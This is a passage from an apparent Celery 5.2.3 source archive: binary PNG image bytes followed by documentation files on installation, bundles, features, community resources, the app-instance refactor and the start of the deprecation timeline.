+C{C&IfLIIf]-W|GacZ~O[A*ucr\[8j. ;8P5^mm6Z%3=ˌ]qZ̉XO/L Qrs1B#AY'>4Q !h4FMG+(~l_l"źzDׅm1%%dV0P L|NF ٯO H$8/(n5udL|"3̔_cFŲ3r\&' sʜW]SDbC<Ǟ#55\6@"gO97>Z$8;?l%nևeJdybzR AY!T}B$!=}=QwbTx:ZI[c >6P>ɾ ִMf}Xcsde.\#f}XK!`'2;uA ~_9*AhqH>ʼk3r+de[% >gF\@woa{a}::(Xά<ˬR}㵁' ll-((u=\t 4u6Jr|$z`HcyE Yf %)7}o'yY5!E5mٳI-:B6t:23*p!pA3Z"0 h$<I>Nٲf*wb&6!=G뎘)a2|ܰf7c$>,\Ћ!)v\c5~AZ {b<2` *5fEIRSwT_i%&z8e׾CU&[ֽ[^2R3d^Y}f} -Ql$<cZQNH٬9p ?׬+U$tȾMFgt{wx%&`L3R3]4 a0Wm)+!g.ӢH"@(BIYD@@׋覙@[OH.(;Wtyf aEB|7Hjr@#u7"wm/I.:JgXa[e]5^^2]VsY~o؉!@P .dYAfRGs *MPv,,Zx+(Q6y?f{L iֈ n*ꚃ&S^in+RS\ڂ6 (A'P"űhql$4~jBfxu-;UWJĨGoN_kD_Ғȍ($@wʌmF$=5]\ 6 ;XCAYI) 0}1>~M()ZSu]fb\T|)ϓ}zE[v\szz{dׁև*zBY4g,Xdև1MܵOA !pj٩Y"'K3"wA^IGtMٶf,ԙu=T2 *\.ƁZrkG]vJNyٗa(%"A!IɭNu.+t7KeE:uq5Q..9#ȳ;Lה~`r*5ңjlf}جisKn0KKIsii8IIE]tJnfZy?L@KW2GBʶl4f-g_Z\vmXVx\4a+ιDfO-EA{pA:*"(00}h|kMw)  GMg}L Uy#9֟6ϯ_{ UÕ%?=}}f}=[Ķ6ηֆ-%.$8hp1AX8INQ*qyDד'f 亁d% JҜnЗ+-'[gs4V7,[mU[0 ̦˲.6 sNy>O"v (SoPabJiMedD1׋tPvvaqmf'tQQ@ P,P8@>ojKE@gO 茀GXaL0V[ܸr|YdY.B2 @BNJW҃K[wkGʂA]=]ԤAGOv![X*Yyf}n3y@IeN-ꊀ%)5aCCo$vpur-S'}Ԧ荛u}&عY6h\pEf}XQnep d2'uZOGokXHʴ]ݨPk=tvuȭW~z 5X>kSg_gևeoD<@ KiP43R 6HoljS0l>V>Y 12>l&cⱺIINeٙev\IO < @EMWP7 y⥧MM-Б2.:CT7?|]f*kbBYv0MұnfMMlio\o7B()P, ;&;_ z ʜߑ.iïțЌ<ړͩuJT 5#rayx9 ]1$x̺C,,6ɲ/ENY}eL5 Ӥ/UʬeEט@,# 0hq,6֔a6&[Y[I;b2&}$Z xx(@P6" O `_)oYMX7 tkټk;cLdjFs1 @AYp@b\h;6&[@2ROv/Lccs]Ɩi66[ZUW[ɩ,WEl.@Pfz '`e}=>"*d'D\^:R]`W34p؇|$@PK HYw_kN&3J֬vw?x.˖9sQatwK.z4hc]و<<2^8P ).d_ǁ*wwKgod%3%m>&yoxXQe\WK =PG ! ( $ ID+(M'%G\ %Ӎt$>E'VշɎu;߽'}1o>/q  (sWҚ(Б2ݺQ (t6Sד%%Hr| kg*ef  ˟/Ϟ.:P8qTJ0ԞG@ ϖ@R1:@Y؜)y1F)g+/4AYAAʦ7IIHIb9HFAƠ{zezck1߬ g+:o@) { Bͣu|go)I)`p^"jK6_}WRciiޓ{o׌lm>y|FΘf֍q:![2{C`D2#elL@KWL˞>Ywu̚}IJVz3MO^M~t$&>eYeYRq^Š%>9^ g0e~_$H?F&$'Hќ"9hn#P̆BF 5!Us( rMl%IV %7/Ѥe?k>{?-Ȍ3dwHrw `S2v B`4M7ni-pG d̋) o^"w,[\br__*ML2#C˙rs2MZ*efC'  6 (A'P+ۻ{:!0.]Ogcu>'M &&Yss9c@l$@uUA`:[GNfbĹ ôFP>c4GFRF@pA#J#pB@/XSO4(b,2\@ *ʢi[RӤGDe3z8fBu@-@PQ.ZZ\GJ@דIHfRV.u@pA뻘Y@}xb=f:I#uڬ'cJQ@.@PhRƆ@$4>d $@PMM[])AYsW+F'hF N (srQw,]Wƚ2^ fTHhs @h (ަO_7lS@S|>@R,*FI ӚJo[~c[4(v h2GwGDjr}lR@5Sc4'> L,dd¨YבY6@AYh=) IJ}̆@8#ee# eu:2u퓶V۪W  [ғ#6F@ wb cB DAYt;v@NJyಖ4v6'#}@@ q-@`2S$1.QsAZdTk\@GM=1ӫ;w=ǧÈQnv;MF0" al2&Ge^\44wIN=*o̞9WY01nߙ&>@ "ea"_ ;9GjZB\!*4܌j{'^Μd6 y}ërzr[ad' A!8A@Gvn+L)rB9==u!Oȫ,ϿBV-]=aC@`Lec`+'>Ϭ+lJ@דeC<(|ZN{C@q fKKz!(_8FLħ:{K{{QtWdd@Hc. o7ţd=#_.2@ F\Љ4jWB"3޶ʔrUwJrbrHL)@@F5xtL@yo'hLr3 ^p#e.Py﨓´Ơ!n+Giœ^uµKBbI! $@P6 p@r|$'H]q2de&eٱz!Swoeokge!" 0Tl#pk)txC-t:lR|$%٢>ᬄfV -򕛾.Sr k(x;t ! , F[֟o|[dxP @MŁ8C ?jnwhjM m˞M3e3Sk?#I ts6@eN5)s$66V‰Б9^~g<u+o*#8]=H"+z~3=|vu卣>ejI|喯KFZd@B)PjR6ue5-GmT#4)]0i>/N}䪋 v (SoPB(PV$;jIw$zCX2EEoM_tHw.  (s`Qeȳ֕VV+S9cQ2PL]&cru_N>uE2(p=::jʢCRM.OʌTAuM޾^ߔ⼒H]  0.qq(L/"ه3v$N%wJx+_ka;[* P/{\$PQ" VєH81{ߑOeƔ MVEHT @BHU@}hcdakٱ^>IKW?g ϼHnoGZ L_C@o/5VP6-{;E+.d>g#w~ 7YYxn}  ( (!`3¸njEu,bbb$#7XnlW̚:ά @8" O biHYFRچc(--&"Y0=1 v`̮=CN_ě)d i̋I?ٞ'B̵4WCp}?u=-D " Pt̮7ly[2Ǻo_n@`Q PQ*olQd8N~_eÑ?[\rrkBNC@~ٯO!(,^9V)]ÊmW~ʻ/WF@殗A)e@%KzRi9d2FAi8둴qZ;Z嗏#Mu"3*B{JC@٠(0i>Kq  Hf^Ե?)_&C> @FKK$L:^6$Yٓ^wOȖveOz  ( ,"`3´"3-5 o}\W,/?$5)u@WH#]@o7)G?#Nkn4t- !e5;S/?!> Yt@ 0R֞] #S;̳vyBw:~PӃ{z{'~!o~ܶdt@enaڇ@&m0' ia#d8_3?^,w堵K7~UN{fخO Qv@vvJj>h22PMFsF''3|=R{H֏%'&yգ _q&(˜"Yw*^) gţuGdǾmYj5B6x|ֻ,K  (oP3"Pje=Y)ԹNKL̉.?~6 }gHs9  (g#8\INHÌ9Yᮾ. :ٸ|lY/~\~#}}le# `k֔ٺ{0Seai:N@Gt W:Y'?`oq}G2Ӳ @TEE7H eMwJ{O[X3 *Y@'%Jr\rȫ"6-ޏѩ>ILH9+eEd!ק@@'9#!(L+xOn>$熸ts@SWcF^{ez2z%/'_V,t@Vv_ω *@R7j!ꔕVG@dK{6J H3sHZz?=闡f"ϼ\nSc5" |#9ibMa|cY U'/(əɒ=&v\$$I 5V7JC[pO@ i  d)cz#ސ %IFAFHtKani @@`L3' 8),h@@*@PЎB`j4i=*ݡ(2@@!@P64NA-:RY5tKh  82uF tRQ"MLa *%! c (G#:xm4@pAz:"F2+5W0! D^,\[ R9ظV2  @EKONN!P=LaI! DV,\ [ FO* n (s{>x,so hA@AY(5)  L˙.k  ʜgX>=hپO    ^N FbduϲeN|oW]p7c=>1#=q#=~@AY1)  ̐ƎijrzS\_>A^k#U1=f˳[F ,x]^U9x=R2D6p @@`bM̏p@fRZe$yp]Z ^z5T7ֿl֮fwu˃{P_fIRZrm'(  0HA|*03w|p]Y2ekί:?i*ov;ڤJVbN|WZC[`8@8NSDryn: ӭ5flh]vgLlU7eYt"DGr[! e#hЛHdIU21Unak`vfdIFAIN=} @.qQ!0#wkh/$  L D@iz~uJp[v7iIЭ@ٕ]=)G@qSMS#*{jgQ>l{~5_dӛ$57U gzo@@`|M_Y.ț-;kiiE.k]t6|I}k<'O!=7Yg3C4;# \F8laD@F {ɞ]BPY7%5;k=vV,%7/5Ro"} y7siyir?^%z F MQnSKޫ .Q< nlbDӧ~$;I҈\oŖc-]-x)y}ft,!5AOyx<͞'_]y 8RZ2r5e:*@eOPr $$HQ2&- [@r@l.@PfzL@|lh`~dW#  (se(B+03w4v4HCljT-@@ (%/Y@@B+@PZOJC_וz{]F LAdsM(0=g|>9аρ  }7 [ h:|MnEe@@ 9??$k?r)@@e_Z@HrS$'%ѲR DAYh?cЄKwp@@ʆSa(P3Cbcbe_ @@ʂHbD3~r@@B#@PGJA fϕ֮9r8Mc@@pC2p@fR;\R _,\W )-ŕQ  @"%up@iIMH]gi DZ,\Hʛ#U{V @@ e7F`f,T  F ѓhF5cYVٱnbQ<~7OǍ͢M *@P6* 4=޺RzTҋOuhT?w7ʙΚC滯KFZʲ gرZ @  ng6Stu~fnkɿ<.,+INluF@ MS@`dY咖.k|Ȗ=u eSA@( (NDJ`^WW::#uIG]xcΓ,uTݩ, N,tCΔxOeCdD{ s ڕן<;@@ zʢi)xdu߲]wH7׷}7fnع @,@Pf`G fϕhKwk̴<@@ (~DL >6^40YM}]/z<ꓲfUR1e]I@@ eRDNa˞]J`$=,X"-h< |,@P@ LDțm{}0]{MbԔ4[]Yj  ((7C z*}]RU'*r$HOJ   ^@r\ȭ6Mۆ-oۛޔ/M @ ( C@ 4 JGOkPʡc 笒Pc  (8C RNDhY{W)k]%SfR@@ jʢi(XPH:zeon{VpZ55CO= g-ghF@N (;ل= AԄ4;K6l+OR~#5%Mn։H   eQ4{ hYO_i|w/^7Ԛ'=@@ `8*"ȶS ӯa7oA   0hq,M`^Bax ֬ N?tZ{wUb~   ( @dN~l?g!8 DͭaJhl_2l\vqi  e[&YpI]6Mw[WOO?(111rەK @AD9B&IƸvtu܉TUל-~iwJ :b9@x@s *eź)K'F0uyn rYK]qٲ{>~Xǟ3RW2u  L2gF,,Z,T-%-!},-ʻ/ |Ϛd  0Vq<]`f,^U6P+0{L$e=^,_x%Gc? -@P4"@4}ѲH]zu4(Ě{Ɗך8{bZ)-(t,   (!@XfKNx}Y>^ku=YͬO+/ZKt8@@q Ĵz|:@j~@:'JOG< eAɮwIbv/ɗԲg[)W]#EqA]@@ zBG)M@x }NT9AVS-T\O[tڃ:@@ ʢi1aЀ,.]RCӞH_X:B@@ ,<:,  '@PG!  a ( +"   Q   @XJ   @pe9q   R(   AYpN  E,,  '@PG!  a ( +"   Q   @XR*"|rHfqWˎu;rɝ;9 8IIE]p/nvڢEkɚ﬑_s;@@$@PޢH;G|^@^ы=!gOJOoWο|)U0  [ғ -T㴼4}ny+~s/n?i;@@7i.[+/]$6} ξl,UoUIJv,RYɥo>yg/ˁwHZnwyo ՞7k&VK|b,2ya_-/7Iݾ:YzĚ1  0/NDs@ "#-n l_#09IDAT2rxHf]8Ky?O.r-|{V\w;?.y^ΖN|E@B"HYH)&C@GnM+[j[A\ry*.0   H|CI1 yAA15@yNctʢ ڟ귃61hם1{A@B)@PJMBGtuKl\1 ͪujeC{@@ de! p@"qsns_%r  r֔@ X(==7UC~o| SéK `K]#6g0\^  LDt'RՀlJ4X@@@9BP(c@@@ 1&\ @@*@P6T@@@ EK!  C/~ nIENDB`././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6197536 celery-5.2.3/docs/includes/0000775000175000017500000000000000000000000015433 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/includes/installation.txt0000664000175000017500000000767000000000000020707 0ustar00asifasif00000000000000.. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using :command:`pip`: .. code-block:: console $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the :command:`pip` command-line by using brackets. Multiple bundles can be specified by separating them by commas. .. code-block:: console $ pip install "celery[librabbitmq]" $ pip install "celery[librabbitmq,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the :pypi:`eventlet` pool. :``celery[gevent]``: for using the :pypi:`gevent` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[librabbitmq]``: for using the librabbitmq C library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport (*experimental*). :``celery[tblib]``: for using the :setting:`task_remote_tracebacks` feature. :``celery[memcache]``: for using Memcached as a result backend (using :pypi:`pylibmc`) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[dynamodb]``: for using AWS DynamoDB as a result backend. :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: .. code-block:: console $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. _celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of :pypi:`kombu`, :pypi:`amqp`, :pypi:`billiard`, and :pypi:`vine`. You can install the latest snapshot of these using the following pip commands: .. code-block:: console $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the :ref:`Contributing ` section. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756907.0 celery-5.2.3/docs/includes/introduction.txt0000664000175000017500000001445000000000000020721 0ustar00asifasif00000000000000:Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors -- What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ and node-celery-ts_ for Node.js, and a `PHP client`_. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _node-celery-ts: https://github.com/IBM/node-celery-ts What do I need? =============== Celery version 5.1.x runs on, - Python 3.6 or newer versions - PyPy3.6 (7.3) or newer From the next major version (Celery 6.x) Python 3.7 or newer is required. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4 was Celery series 2.2 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery 5.0.x or 5.1.x coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html Celery is… ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make:: from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports… ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``), thread - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. _`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/includes/resources.txt0000664000175000017500000000254600000000000020215 0ustar00asifasif00000000000000.. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://freenode.net .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki .. _contributing-short: Contributing ============ Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html .. _license: License ======= This software is licensed under the `New BSD License`. See the :file:`LICENSE` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/index.rst0000664000175000017500000000311500000000000015466 0ustar00asifasif00000000000000================================= Celery - Distributed Task Queue ================================= Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. Celery is Open Source and licensed under the `BSD License`_. Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor Getting Started =============== - If you're new to Celery you can get started by following the :ref:`first-steps` tutorial. - You can also check out the :ref:`FAQ `. .. _`BSD License`: http://www.opensource.org/licenses/BSD-3-Clause Contents ======== .. toctree:: :maxdepth: 1 copyright .. toctree:: :maxdepth: 2 getting-started/index userguide/index .. toctree:: :maxdepth: 1 django/index contributing community tutorials/index faq changelog whatsnew-5.2 reference/index internals/index history/index glossary Indices and tables ================== * :ref:`genindex` * :ref:`modindex` * :ref:`search` ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6277537 celery-5.2.3/docs/internals/0000775000175000017500000000000000000000000015624 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/app-overview.rst0000664000175000017500000001354100000000000021006 0ustar00asifasif00000000000000============================= "The Big Instance" Refactor ============================= The `app` branch is a work-in-progress to remove the use of a global configuration in Celery. Celery can now be instantiated and several instances of Celery may exist in the same process space. Also, large parts can be customized without resorting to monkey patching. Examples ======== Creating a Celery instance:: >>> from celery import Celery >>> app = Celery() >>> app.config_from_object('celeryconfig') >>> #app.config_from_envvar('CELERY_CONFIG_MODULE') Creating tasks: .. code-block:: python @app.task def add(x, y): return x + y Creating custom Task subclasses: .. code-block:: python Task = celery.create_task_cls() class DebugTask(Task): def on_failure(self, *args, **kwargs): import pdb pdb.set_trace() @app.task(base=DebugTask) def add(x, y): return x + y Starting a worker: .. code-block:: python worker = celery.Worker(loglevel='INFO') Getting access to the configuration: .. code-block:: python celery.conf.task_always_eager = True celery.conf['task_always_eager'] = True Controlling workers:: >>> celery.control.inspect().active() >>> celery.control.rate_limit(add.name, '100/m') >>> celery.control.broadcast('shutdown') >>> celery.control.discard_all() Other interesting attributes:: # Establish broker connection. >>> celery.broker_connection() # AMQP Specific features. >>> celery.amqp >>> celery.amqp.Router >>> celery.amqp.get_queues() >>> celery.amqp.get_task_consumer() # Loader >>> celery.loader # Default backend >>> celery.backend As you can probably see, this really opens up another dimension of customization abilities. Deprecated ========== * ``celery.task.ping`` ``celery.task.PingTask`` Inferior to the ping remote control command. Will be removed in Celery 2.3. Aliases (Pending deprecation) ============================= * ``celery.execute`` * ``.send_task`` -> {``app.send_task``} * ``.delay_task`` -> *no alternative* * ``celery.log`` * ``.get_default_logger`` -> {``app.log.get_default_logger``} * ``.setup_logger`` -> {``app.log.setup_logger``} * ``.get_task_logger`` -> {``app.log.get_task_logger``} * ``.setup_task_logger`` -> {``app.log.setup_task_logger``} * ``.setup_logging_subsystem`` -> {``app.log.setup_logging_subsystem``} * ``.redirect_stdouts_to_logger`` -> {``app.log.redirect_stdouts_to_logger``} * ``celery.messaging`` * ``.establish_connection`` -> {``app.broker_connection``} * ``.with_connection`` -> {``app.with_connection``} * ``.get_consumer_set`` -> {``app.amqp.get_task_consumer``} * ``.TaskPublisher`` -> {``app.amqp.TaskPublisher``} * ``.TaskConsumer`` -> {``app.amqp.TaskConsumer``} * ``.ConsumerSet`` -> {``app.amqp.ConsumerSet``} * ``celery.conf.*`` -> {``app.conf``} **NOTE**: All configuration keys are now named the same as in the configuration. So the key ``task_always_eager`` is accessed as:: >>> app.conf.task_always_eager instead of:: >>> from celery import conf >>> conf.always_eager * ``.get_queues`` -> {``app.amqp.get_queues``} * ``celery.utils.info`` * ``.humanize_seconds`` -> ``celery.utils.time.humanize_seconds`` * ``.textindent`` -> ``celery.utils.textindent`` * ``.get_broker_info`` -> {``app.amqp.get_broker_info``} * ``.format_broker_info`` -> {``app.amqp.format_broker_info``} * ``.format_queues`` -> {``app.amqp.format_queues``} Default App Usage ================= To be backward compatible, it must be possible to use all the classes/functions without passing an explicit app instance. This is achieved by having all app-dependent objects use :data:`~celery.app.default_app` if the app instance is missing. .. code-block:: python from celery.app import app_or_default class SomeClass: def __init__(self, app=None): self.app = app_or_default(app) The problem with this approach is that there's a chance that the app instance is lost along the way, and everything seems to be working normally. Testing app instance leaks is hard. The environment variable :envvar:`CELERY_TRACE_APP` can be used, when this is enabled :func:`celery.app.app_or_default` will raise an exception whenever it has to go back to the default app instance. App Dependency Tree ------------------- * {``app``} * ``celery.loaders.base.BaseLoader`` * ``celery.backends.base.BaseBackend`` * {``app.TaskSet``} * ``celery.task.sets.TaskSet`` (``app.TaskSet``) * [``app.TaskSetResult``] * ``celery.result.TaskSetResult`` (``app.TaskSetResult``) * {``app.AsyncResult``} * ``celery.result.BaseAsyncResult`` / ``celery.result.AsyncResult`` * ``celery.bin.worker.WorkerCommand`` * ``celery.apps.worker.Worker`` * ``celery.worker.WorkerController`` * ``celery.worker.consumer.Consumer`` * ``celery.worker.request.Request`` * ``celery.events.EventDispatcher`` * ``celery.worker.control.ControlDispatch`` * ``celery.worker.control.registry.Panel`` * ``celery.pidbox.BroadcastPublisher`` * ``celery.pidbox.BroadcastConsumer`` * ``celery.beat.EmbeddedService`` * ``celery.bin.events.EvCommand`` * ``celery.events.snapshot.evcam`` * ``celery.events.snapshot.Polaroid`` * ``celery.events.EventReceiver`` * ``celery.events.cursesmon.evtop`` * ``celery.events.EventReceiver`` * ``celery.events.cursesmon.CursesMonitor`` * ``celery.events.dumper`` * ``celery.events.EventReceiver`` * ``celery.bin.amqp.AMQPAdmin`` * ``celery.bin.beat.BeatCommand`` * ``celery.apps.beat.Beat`` * ``celery.beat.Service`` * ``celery.beat.Scheduler`` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/deprecation.rst0000664000175000017500000001310000000000000020646 0ustar00asifasif00000000000000.. _deprecation-timeline: ============================== Celery Deprecation Time-line ============================== .. contents:: :local: .. _deprecations-v5.0: Removals for version 5.0 ======================== Old Task API ------------ .. _deprecate-compat-task-modules: Compat Task Modules ~~~~~~~~~~~~~~~~~~~ - Module ``celery.decorators`` will be removed: This means you need to change: .. code-block:: python from celery.decorators import task Into: .. code-block:: python from celery import task - Module ``celery.task`` will be removed This means you should change: .. code-block:: python from celery.task import task into: .. code-block:: python from celery import shared_task -- and: .. code-block:: python from celery import task into: .. code-block:: python from celery import shared_task -- and: .. code-block:: python from celery.task import Task into: .. code-block:: python from celery import Task Note that the new :class:`~celery.Task` class no longer uses :func:`classmethod` for these methods: - delay - apply_async - retry - apply - AsyncResult - subtask This also means that you can't call these methods directly on the class, but have to instantiate the task first: .. code-block:: pycon >>> MyTask.delay() # NO LONGER WORKS >>> MyTask().delay() # WORKS! Task attributes --------------- The task attributes: - ``queue`` - ``exchange`` - ``exchange_type`` - ``routing_key`` - ``delivery_mode`` - ``priority`` is deprecated and must be set by :setting:`task_routes` instead. Modules to Remove ----------------- - ``celery.execute`` This module only contains ``send_task``: this must be replaced with :attr:`@send_task` instead. - ``celery.decorators`` See :ref:`deprecate-compat-task-modules` - ``celery.log`` Use :attr:`@log` instead. - ``celery.messaging`` Use :attr:`@amqp` instead. - ``celery.registry`` Use :mod:`celery.app.registry` instead. - ``celery.task.control`` Use :attr:`@control` instead. - ``celery.task.schedules`` Use :mod:`celery.schedules` instead. - ``celery.task.chords`` Use :func:`celery.chord` instead. Settings -------- ``BROKER`` Settings ~~~~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``BROKER_HOST`` :setting:`broker_url` ``BROKER_PORT`` :setting:`broker_url` ``BROKER_USER`` :setting:`broker_url` ``BROKER_PASSWORD`` :setting:`broker_url` ``BROKER_VHOST`` :setting:`broker_url` ===================================== ===================================== ``REDIS`` Result Backend Settings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_REDIS_HOST`` :setting:`result_backend` ``CELERY_REDIS_PORT`` :setting:`result_backend` ``CELERY_REDIS_DB`` :setting:`result_backend` ``CELERY_REDIS_PASSWORD`` :setting:`result_backend` ``REDIS_HOST`` :setting:`result_backend` ``REDIS_PORT`` :setting:`result_backend` ``REDIS_DB`` :setting:`result_backend` ``REDIS_PASSWORD`` :setting:`result_backend` ===================================== ===================================== Task_sent signal ---------------- The :signal:`task_sent` signal will be removed in version 4.0. Please use the :signal:`before_task_publish` and :signal:`after_task_publish` signals instead. Result ------ Apply to: :class:`~celery.result.AsyncResult`, :class:`~celery.result.EagerResult`: - ``Result.wait()`` -> ``Result.get()`` - ``Result.task_id()`` -> ``Result.id`` - ``Result.status`` -> ``Result.state``. .. 